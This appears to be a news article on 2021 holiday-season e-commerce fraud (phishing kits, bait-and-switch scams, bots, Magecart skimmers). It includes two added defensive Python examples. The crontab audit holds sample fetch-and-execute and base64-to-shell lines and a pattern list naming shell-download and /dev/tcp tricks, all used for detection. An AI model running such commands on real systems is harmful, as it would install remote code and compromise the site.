The holiday shopping season sees vast numbers of people flock online to take advantage of mass sales, most notably during the Black Friday and Cyber Monday period of late November. Cybercriminals are known to significantly expand their efforts to exploit bargain-seeking shoppers during this time in the lead-up to Christmas, and 2021 has been no exception.

Research from TransUnion discovered that almost 18% of all global e-commerce transactions between Thanksgiving and Cyber Monday were potentially fraudulent, a 4% increase on the same period last year. Here are four examples of how fraudsters targeted the 2021 holiday shopping season with scams and attacks, along with insight into how retailers can prevent and defend against such activity moving forward.

Phishing-as-a-service activity targets Black Friday shoppers

Email security firm Egress revealed increased phishing-as-a-service (PhaaS) activity imitating major brands in the lead-up to and on Black Friday. It discovered a 397% increase in typosquatting domains tied to phishing kits, with a 334.1% increase in phishing kits impersonating Amazon.

Researchers observed almost 4,000 pages imitating the retail giant and detailed an example of a phishing email distributed on Black Friday offering fake Amazon promotions. This attempted to lure recipients into completing an attached form to receive a coupon. Further analysis revealed that the attachment contained XBAgent malware.

“PhaaS has lowered the barriers to entry for cybercriminals, making it easy to impersonate well-known brands and trick victims.
The recent increase in the number of phishing kits listed for sale highlights the criminals’ appetite for carrying out attacks during busy shopping periods,” stated Egress VP of threat intelligence Jack Chapman in a press release.

How retailers should respond to phishing campaigns

Speaking to CSO, Egress CEO Tony Pepper highlights the important role retailers must play in defending against phishing campaigns of this kind. “I’d like to see more retailers proactively informing their customers of what they should expect from them when it comes to email communication,” he says. “It can be as simple as providing guidance on their website and social media channels about what email domains they use, and how they’ll usually contact their customers, alongside the more general advice around how to spot and report a phishing email.”

Retailers also need to respond to the trend whereby cybercriminals exploit vulnerabilities in websites to hack in and build their own fraudulent pages for collecting credentials. “In a recent case involving UPS, hackers were able to build a page within the real UPS website, which was then used in phishing attacks,” says Pepper. “Because the link was technically legitimate, it was almost impossible for the recipient to know that they were being duped. Retailers have a responsibility to ensure that vulnerabilities are identified and patched so that their website can’t become a tool for cybercriminals.”

Bait-and-switch scheme lures shoppers to fraudulent sites

Another notable fraud tactic detected this holiday shopping season is a type of “bait-and-switch” scheme designed to trick victims into thinking they’re getting great deals via an online comparison site, only for them to be directed to a phony website that collects their information, says Serpil Hall, head of financial crime and fraud prevention at D4t4 Solutions.
“Once victims fill out forms and register their interest, someone from the fake website calls them, gets their card details, and soon after disappears with their money. The victim gets scammed, the card details are used elsewhere for other purchases, and the great deal made over the phone never materializes,” Hall tells CSO.

When fraudsters get their hands on card details, they often take them for a test drive with big merchants, making a small purchase to test out the info they’ve obtained before moving on to make bigger purchases, Hall adds. “Soon after the confirmation, they call the merchant’s customer support and change the delivery address to a very convenient pick-up address. The victim eventually realizes that there is fraud on their card and makes a complaint to their bank, forcing the merchant to bear the losses.”

How retailers should respond to bait-and-switch scams

To prevent this type of fraud, retailers need to adopt strategies and technologies that catch fraudsters in real time, Hall says. “Using advanced machine-learning algorithms, merchants should move to identifying fraudulent transactions using unique identifiers like IP geolocation, email addresses, and postal addresses. However, fraud prevention is not limited to these methods, and real-time mechanisms that auto-decline high-risk orders, as well as send risk signals for new account fraud and account takeover cases, are also required.”

Behavioral biometrics grant merchants this capability by constantly measuring the way in which consumers swipe on their devices, how they hold their devices, specific keystroke patterns, device movements, and more.
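The behavioral signals just described can be checked with plain statistics on the telemetry a merchant's own checkout page reports. The following is an added example and is not code from the article, from D4t4 Solutions, or from any vendor quoted here. It scores constructed session telemetry (keystrokes, pointer moves, scrolls and add-to-cart clicks with millisecond timestamps) on two heuristics: scripted input tends to have near-identical gaps between keystrokes, and a burst of add-to-cart actions within a couple of seconds is the bot-driven inventory hoarding pattern the article goes on to describe. The event format, the thresholds and the sample sessions are all assumptions for illustration.

```python
"""Added example, not code from the article or any vendor quoted in it.

Scores constructed checkout-page telemetry (keystrokes, pointer moves,
scrolls, add-to-cart clicks, each with a millisecond timestamp) for
non-human interaction patterns. Thresholds are illustrative assumptions.
"""
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Event:
    session: str
    kind: str   # "key", "pointer", "scroll" or "add_to_cart"
    t_ms: int   # milliseconds since the session started


MIN_KEYS = 5          # need this many keystrokes before judging timing
CV_THRESHOLD = 0.15   # coefficient of variation below this looks scripted
BURST_WINDOW_MS = 2000
BURST_MAX_CARTS = 5   # more add-to-cart actions than this per window is a burst


def interkey_cv(events):
    """Coefficient of variation of the gaps between keystrokes; None if too few keys."""
    keys = sorted(e.t_ms for e in events if e.kind == "key")
    if len(keys) < MIN_KEYS:
        return None
    gaps = [b - a for a, b in zip(keys, keys[1:])]
    m = mean(gaps)
    return 0.0 if m == 0 else pstdev(gaps) / m


def max_carts_in_window(events, window_ms=BURST_WINDOW_MS):
    """Largest number of add-to-cart actions falling inside any window_ms span."""
    carts = sorted(e.t_ms for e in events if e.kind == "add_to_cart")
    best = start = 0
    for end in range(len(carts)):
        while carts[end] - carts[start] > window_ms:
            start += 1
        best = max(best, end - start + 1)
    return best


def score_session(events):
    """Return the list of reasons a session looks automated (empty for a human)."""
    reasons = []
    cv = interkey_cv(events)
    if cv is not None and cv < CV_THRESHOLD:
        reasons.append(f"keystroke timing too regular (cv={cv:.2f})")
    has_cart = any(e.kind == "add_to_cart" for e in events)
    has_motion = any(e.kind in ("pointer", "scroll") for e in events)
    if has_cart and not has_motion:
        reasons.append("cart action with no pointer or scroll events")
    burst = max_carts_in_window(events)
    if burst > BURST_MAX_CARTS:
        reasons.append(f"{burst} add-to-cart actions within {BURST_WINDOW_MS} ms")
    return reasons


def flag_sessions(events):
    """Group events by session and keep only those with at least one reason."""
    by_session = {}
    for e in events:
        by_session.setdefault(e.session, []).append(e)
    flagged = {}
    for sid, evs in by_session.items():
        reasons = score_session(evs)
        if reasons:
            flagged[sid] = reasons
    return flagged


# Constructed telemetry: one human-looking session and one scripted one.
SAMPLE_EVENTS = (
    [Event("human-1", "key", t) for t in (0, 180, 410, 520, 900, 1150)]
    + [Event("human-1", "pointer", t) for t in (100, 600, 1300)]
    + [Event("human-1", "scroll", 1500), Event("human-1", "add_to_cart", 2000)]
    + [Event("bot-1", "key", t) for t in range(0, 300, 50)]        # a key every 50 ms
    + [Event("bot-1", "add_to_cart", t) for t in range(300, 1100, 100)]  # 8 carts in 0.7 s
)


def demo():
    """Run the detector over the constructed sample and return flagged sessions."""
    return flag_sessions(SAMPLE_EVENTS)


if __name__ == "__main__":
    for sid, reasons in demo().items():
        print(sid, "->", "; ".join(reasons))
```

In production these scores would be one input to a risk engine rather than an automatic decline: accessibility tools and password managers also produce very regular keystroke timing, so a single heuristic should raise a signal, not block a customer.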
Using this data, merchants can understand when digital patterns diverge from past behavior – potentially indicating a compromised account – and take immediate action to stop fraudulent activity dead in its tracks.

Checkout abuse and inventory hoarding skew market trends

Given the nature of the discount-heavy holiday shopping period, the market is increasingly saturated with many retailers – and fraudsters – wanting a slice of the cake, says Ping Identity’s head of fraud Alasdair Rambaud. As a result, checkout abuse (the e-commerce equivalent of ticket scalping) is highly likely to have taken place, he tells CSO. “Fraudsters use an automated script to buy a volume of high-end, limited-edition products in minutes or seconds, depleting legitimate merchants’ inventories. They then resell those items for much higher prices.”

Similarly, inventory hoarding – the process of using bots to put products in shopping carts, skewing inventory data and making products appear to be out of stock – has also been doing the rounds, Rambaud adds. “Bots can wipe out inventory of an item in as little as two seconds.” The fact is that e-commerce is here to stay, and now it’s time for retailers and brands to have a steadfast strategy when it comes to this type of fraud – failure to do so will lead to reputational damage, he says.

How retailers should respond to checkout abuse and inventory fraud

“Retailers need to understand the scope of account takeovers, new account fraud, and other fraud attacks,” Rambaud says. This involves analyzing movements and behaviors – looking for non-human trends with regards to keystrokes, scrolling, mouse movement, and touchscreen interaction.

Magecart card skimming attacks target WooCommerce

Card skimming is a common fraud tactic that targets online purchases. It works by injecting malicious code into e-commerce sites that skims online payment forms.
This style of attack first came to prominence against e-commerce platform Magento, with numerous criminal groups subsequently turning to card skimming tactics to steal payment card details.

One such group is Magecart, and research from RiskIQ has identified new attacks taking advantage of potential vulnerabilities and weaknesses in WooCommerce (an open-source WordPress plugin widely used by online retailers) during the latest holiday shopping period. In a blog post, the cyberthreat intelligence company detailed three new Magecart skimmers it has identified targeting retailers using the WooCommerce plugin. These are:

The WooTheme Skimmer: Detected across five domains using a compromised WooCommerce theme, this skimmer is “relatively simplistic and makes its functionality reasonably easy to understand,” RiskIQ said. Operators obfuscated the skimming code in all discovered iterations except one. However, this one instance appears to be in error, as RiskIQ detected the obfuscated skimmer on the same compromised domain before the cleartext version appeared.

The Slect Skimmer: In this case, a spelling error of the word ‘select’ in the script revealed a never-before-seen skimmer which does two interesting things once the DOM content is fully loaded, RiskIQ explained. “It will look for a series of form fields that the skimmer does not want to pull data from, such as open text fields, passwords and checkboxes. Next, an event listener listens for a click on a button, likely to evade sandboxing by security researchers.” The exfil domain found within the skimmer has been previously associated with other Magecart infrastructure.

The Gateway Skimmer: This skimmer was piled high with multiple layers and steps taken by the actor to hide and obfuscate processes, RiskIQ said.
“The skimmer code is massive and difficult to digest while obfuscated and runs a few unique functions observed in other skimmers.”

How retailers should respond to card skimming

While in the thick of the holiday season, an increase in e-commerce targeting puts retailers and online shoppers particularly at risk of card skimming, RiskIQ’s blog read. “WooCommerce users are often small and medium-sized businesses, sometimes considered the most vulnerable, as they lack resources for complex and highly-vetted third-party tools.” However, as evidenced over the years, both small and large retailers can be the targets of Magecart skimming. “Beyond having robust detections for malware, website operations should regularly inspect their crontab commands for strange contents, ensure that access permissions are correct, and audit file access to it,” RiskIQ added.
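One concrete shape for the crontab, permissions and file-access advice above, as an added example that is not code from RiskIQ, WooCommerce or the article: it flags crontab lines carrying patterns typical of scheduled droppers, reports web-root files that are world-writable or unexpectedly executable, and compares SHA-256 hashes against a saved baseline so an altered theme or plugin JavaScript file (the usual home of injected skimmer code) stands out. The directory layout, the suspicious-pattern list and the sample crontab are constructed for the demo and are assumptions, not anything taken from a real compromise.

```python
"""Added example, not RiskIQ's or WooCommerce's code: a small site integrity audit."""
import hashlib
import os
import re
import stat
import tempfile

# Assumed patterns; each is a common persistence shape, not a specific campaign.
SUSPICIOUS_CRON = [
    r"(curl|wget)\b.*\|\s*(ba)?sh",   # download piped straight into a shell
    r"base64\s+(-d|--decode)",         # payload decoded at run time
    r"/dev/tcp/",                      # bash network redirection
    r"php\s+-r\b",                     # inline PHP
    r"/tmp/\S+",                       # a job running out of a temp directory
]


def audit_crontab(text):
    """Return (line_no, matched_pattern, line) for each non-comment line that matches."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        for pat in SUSPICIOUS_CRON:
            if re.search(pat, s):
                findings.append((n, pat, s))
                break
    return findings


def audit_permissions(root, exec_ok=(".sh",)):
    """Flag world-writable files and executable bits on web content under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            mode = os.stat(p).st_mode
            rel = os.path.relpath(p, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) and not f.endswith(exec_ok):
                findings.append((rel, "executable bit on web content"))
    return findings


def sha256_file(p):
    h = hashlib.sha256()
    with open(p, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative path) to its SHA-256."""
    return {os.path.relpath(os.path.join(d, f), root): sha256_file(os.path.join(d, f))
            for d, _, files in os.walk(root) for f in files}


def diff_manifest(baseline, current):
    """Files whose hash changed, plus files that appeared or disappeared since the baseline."""
    return {
        "changed": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


# Constructed sample crontab: one legitimate backup job and three suspicious entries.
CRONTAB_SAMPLE = """\
# constructed sample crontab for the demo
0 3 * * * /usr/local/bin/wp-backup.sh
*/5 * * * * curl -s http://198.51.100.7/u | sh
*/10 * * * * echo ZWNobyBoaQ== | base64 -d | sh
@hourly /tmp/.cache/run.sh
"""


def demo():
    """Build a constructed WordPress-like tree in a temp dir and run all three checks."""
    root = tempfile.mkdtemp()

    def write(rel, data, mode=None):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)
        if mode is not None:
            os.chmod(p, mode)
        return p

    write("wp-config.php", b"<?php /* constructed */\n", 0o640)
    js = write("wp-content/themes/shop/assets/checkout.js", b"// constructed theme script\n", 0o644)
    baseline = build_manifest(root)  # what a clean deployment would have recorded

    # Simulate what a compromise leaves behind: an altered theme script and a stray upload.
    with open(js, "ab") as fh:
        fh.write(b"/* constructed: unexpected appended code */\n")
    write("wp-content/uploads/x.php", b"<?php /* constructed */\n", 0o777)

    return {
        "cron": audit_crontab(CRONTAB_SAMPLE),
        "perms": audit_permissions(root),
        "files": diff_manifest(baseline, build_manifest(root)),
    }


if __name__ == "__main__":
    for section, result in demo().items():
        print(section, result)
```

The baseline manifest only helps if it is stored outside the web root and regenerated on each deliberate deployment; a hash file that an attacker with write access to the site can also rewrite proves nothing.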